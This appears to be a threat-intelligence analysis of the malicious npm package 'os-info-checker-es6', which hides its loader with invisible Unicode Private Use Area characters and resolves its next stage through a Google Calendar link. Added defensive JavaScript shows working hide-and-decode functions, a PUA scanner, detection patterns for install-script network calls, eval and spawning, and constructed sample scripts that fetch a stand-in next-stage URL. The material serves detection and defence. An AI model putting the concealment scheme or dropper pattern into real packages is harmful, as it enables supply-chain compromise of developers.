Full Report
Cybersecurity researchers have discovered a malicious package named "os-info-checker-es6" that disguises itself as an operating system information utility to stealthily drop a next-stage payload onto compromised systems. "This campaign employs clever Unicode-based steganography to hide its initial malicious code and utilizes a Google Calendar event short link as a dynamic dropper for its final
Analysis Summary
# Tool/Technique: os-info-checker-es6
## Overview
A malicious npm package disguised as an operating system information utility, intended to drop a next-stage payload onto compromised systems using a multi-stage execution chain involving Unicode steganography and a Google Calendar short link as a dynamic dropper/dead drop resolver.
## Technical Details
- Type: Malware (Initial Dropper/Loader stage)
- Platform: JavaScript/Node.js environments (via npm)
- Capabilities: Unicode steganography for initial code hiding, dynamic payload retrieval via trusted external service (Google Calendar), multi-stage execution.
- First Seen: Published March 19, 2025 (Malicious iteration detected May 7, 2025)
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain (malicious package published to the npm registry and pulled in as a dependency)
- TA0002 - Execution
- T1059.007 - Command and Scripting Interpreter: JavaScript (code runs from an npm lifecycle script under Node.js)
- TA0005 - Defense Evasion
- T1027 - Obfuscated Files or Information (loader hidden with Unicode Private Use Area steganography)
- TA0011 - Command and Control
- T1102.001 - Web Service: Dead Drop Resolver (Google Calendar event short link hosts the pointer to the next stage)
## Functionality
### Core Capabilities
- **Initial Code Hiding:** Encodes the extraction logic and the next-stage URL as a run of Unicode Private Use Area (PUA) characters inside the package's `preinstall.js`. PUA code points have no assigned glyph, so the hidden string renders as nothing in most editors and is decoded at runtime by the visible part of the script.
- **Execution Trigger:** Relies on the package manager running lifecycle scripts during installation; the `preinstall` hook fires before the package is even unpacked into use, so no application code has to import the package.
- **Dynamic Dropper Link:** Contacts a Google Calendar event short link (`calendar.app[.]google/`) and reads the next-stage address out of the event rather than embedding attacker infrastructure in the package.
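To make the PUA technique concrete, the following added example (written for this summary; it is not the package's own code, and the PUA base offset and threshold are assumptions rather than the campaign's values) shows how a string can be hidden as Private Use Area code points, how a loader recovers it, and how a scanner can flag a source file that carries such a run, which is also the pattern a YARA rule would target.

```javascript
// Added illustration of Unicode PUA steganography and its detection.
// Not the malicious package's code; offsets, threshold and sample are assumptions.

// Supplementary Private Use Area-A begins at U+F0000 (assumed base for this demo).
const PUA_BASE = 0xf0000;

// Hide each UTF-8 byte of `plain` as one PUA code point (invisible in most fonts).
function hideInPua(plain) {
  let out = "";
  for (const b of Buffer.from(plain, "utf8")) out += String.fromCodePoint(PUA_BASE + b);
  return out;
}

// What a loader does: keep only code points in the base..base+0xFF window,
// subtract the base to get bytes back, and decode them as UTF-8.
function revealFromPua(text) {
  const bytes = [];
  for (const ch of text) {
    const cp = ch.codePointAt(0);
    if (cp >= PUA_BASE && cp <= PUA_BASE + 0xff) bytes.push(cp - PUA_BASE);
  }
  return Buffer.from(bytes).toString("utf8");
}

// Detector side: count code points in any of the three Unicode PUA blocks.
// Ordinary source files contain none; a long run in an install script is a strong signal.
function isPrivateUse(cp) {
  return (cp >= 0xe000 && cp <= 0xf8ff) ||
         (cp >= 0xf0000 && cp <= 0xffffd) ||
         (cp >= 0x100000 && cp <= 0x10fffd);
}

function scanForPua(source, runThreshold = 8) {
  let count = 0, run = 0, longestRun = 0;
  for (const ch of source) {
    if (isPrivateUse(ch.codePointAt(0))) {
      count++; run++;
      if (run > longestRun) longestRun = run;
    } else {
      run = 0;
    }
  }
  return { count, longestRun, suspicious: longestRun >= runThreshold };
}

// Constructed sample: a benign-looking os utility with a hidden string after "//|".
const HIDDEN_TEXT = "next-stage: https://calendar.example/e/abc";
const samplePreinstall =
  `const os=require('os');console.log(os.platform());//|${hideInPua(HIDDEN_TEXT)}`;

console.log(scanForPua(samplePreinstall));   // flagged: one long run of PUA code points
console.log(revealFromPua(samplePreinstall)); // the loader's view of the same file
```

The visible script in the sample is harmless on its own; everything that matters sits in the invisible tail, which is why reviewing the rendered text of an install script is not enough. On disk the supplementary PUA blocks encode in UTF-8 as a 0xF3 lead byte followed by 0xB0..0xBF, or a 0xF4 lead byte, so a YARA rule can match the same runs at the byte level.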
### Advanced Features
- **Dead Drop Resolution:** Uses a legitimate, widely allowed service (Google Calendar) to host the reference to attacker infrastructure, so the package itself contains no blockable domain or IP and the operator can retarget the chain by editing the event instead of republishing the package.
- **Multi-Stage Delivery:** The npm package only resolves and fetches the next step; the payload it ultimately delivers is not contained in the package, which points to an attack chain that can be changed or extended after installation.
## Indicators of Compromise
- File Hashes: [Not provided in the article]
- File Names: `os-info-checker-es6` (package name), `preinstall.js` (malicious script file)
- Registry Keys: [Not applicable/provided]
- Network Indicators:
- Initial contact URL component: `calendar.app[.]google/` (Used as a dead drop resolver)
- Decoded C2 IP address: `140.82.54[.]223` (This IP was derived from a Base64 string in the Calendar event title, which acted as the next-stage address/instruction set).
- Behavioral Indicators: Execution of `preinstall`/`postinstall` scripts from packages that have no legitimate reason to build anything, and outbound connections (here to `calendar.app[.]google/`) originating from the package installation process rather than from the application.
## Associated Threat Actors
- Attributed to an attacker or group using the npm user "kim9123". (Likely not a known named APT group, but an unknown actor targeting the software supply chain.)
## Detection Methods
- Signature-based detection: Ineffective against the initial stage, since the decoder looks like ordinary JavaScript and the hidden string can be re-encoded at will.
- Behavioral detection: The reliable signal is what happens at install time: lifecycle scripts that should not exist for a trivial utility, file writes outside the package directory, and outbound traffic from the install process.
- YARA rules: [Not provided in the article.] A rule could target runs of Unicode Private Use Area code points inside `.js` files, which legitimate source almost never contains, together with the loader's decode-and-`eval` pattern.
## Mitigation Strategies
- **Version Pinning:** Pin exact versions and commit the lockfile so that a later malicious release of an already-trusted package (this package shipped clean first and turned malicious in a later iteration) is not pulled in automatically.
- **Static and Dynamic Analysis:** Inspect third-party packages before use, paying particular attention to any package that declares `preinstall`, `install` or `postinstall` scripts, and run installs in an instrumented sandbox to observe file and network activity.
- **CI/CD Log Inspection:** Monitor build logs for downloads, script execution or unexpected network destinations during dependency installation.
- **Trust Validation:** Validate third-party packages and dependencies (publisher, age, download history, script contents) before allowing them into production environments.
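The behavioural detection and the mitigation bullets above reduce to one question a CI step can ask before `npm install` runs anything: which dependencies declare install-time lifecycle scripts, and what do those scripts do? The following added example (written for this summary, not code from the article or the package; the package manifests, the `files` field used to attach script bodies, and the risk heuristics are all constructed for illustration) audits a set of manifests and decides whether the install should be blocked.

```javascript
// Added example: audit dependency manifests for install-time lifecycle scripts and grade
// each script body. Manifests, the inline `files` map and the heuristics are constructed.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Assumed heuristics for what a reviewer wants flagged inside code that runs at install time.
const RISKY_PATTERNS = [
  { name: "network",     re: /https?:\/\/|fetch\(|https?\.get\(|net\.connect\(/ },
  { name: "eval",        re: /\b(?:eval|Function)\s*\(/ },
  { name: "spawn",       re: /child_process|execSync\(|spawn\(/ },
  // Any Unicode Private Use Area code point: a marker of the steganography discussed above.
  { name: "pua-unicode", re: /[\u{E000}-\u{F8FF}\u{F0000}-\u{10FFFD}]/u },
];

// `manifests` is a list of parsed package.json objects. When a hook runs `node <file>` and the
// caller attached that file's source under `files[<file>]`, the source is what gets graded.
function auditManifests(manifests) {
  const findings = [];
  for (const m of manifests) {
    const scripts = m.scripts || {};
    for (const hook of LIFECYCLE_HOOKS) {
      const cmd = scripts[hook];
      if (!cmd) continue;
      const target = cmd.replace(/^node\s+/, "");
      const body = (m.files && m.files[target]) || cmd;
      const hits = RISKY_PATTERNS.filter((p) => p.re.test(body)).map((p) => p.name);
      findings.push({
        package: `${m.name}@${m.version}`,
        hook,
        cmd,
        hits,
        // Every install-time script deserves a look; one that matches a pattern blocks the build.
        severity: hits.length ? "high" : "review",
      });
    }
  }
  return findings;
}

function shouldBlockInstall(findings) {
  return findings.some((f) => f.severity === "high");
}

// Constructed manifests: a native addon with a legitimate build step, a stand-in for a
// malicious utility whose preinstall script carries PUA code points and a URL, and a
// library with no lifecycle hooks at all.
const sampleManifests = [
  { name: "native-addon", version: "1.2.0", scripts: { install: "node-gyp rebuild" } },
  {
    name: "suspicious-util",
    version: "0.0.1",
    scripts: { preinstall: "node preinstall.js" },
    files: {
      "preinstall.js":
        "const os=require('os');console.log(os.type());//|\u{F0041}\u{F0042}\u{F0043}" +
        " fetch('https://calendar.example/e/abc')",
    },
  },
  { name: "plain-lib", version: "3.0.0", scripts: { test: "node test.js" } },
];

const report = auditManifests(sampleManifests);
console.log(JSON.stringify(report, null, 2));
console.log("block install:", shouldBlockInstall(report));
```

In a pipeline this runs against the manifests in `node_modules` after a scripts-disabled install (`npm ci --ignore-scripts`, or `ignore-scripts=true` in `.npmrc`), so nothing executes until the audit has passed; packages that land in the `review` bucket, such as native addons, can then be allow-listed explicitly rather than trusted by default.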
## Related Tools/Techniques
- **Dependent Packages (Suspected Coordinated Campaign):**
- `skip-tot` (lists `os-info-checker-es6` as dependency)
- `vue-dev-serverr`
- `vue-dummyy`
- `vue-bit`
- **Adversarial Techniques Cited (General context):** Typosquatting, Go repository caching abuse, obfuscation, multi-stage execution, abuse of legitimate services.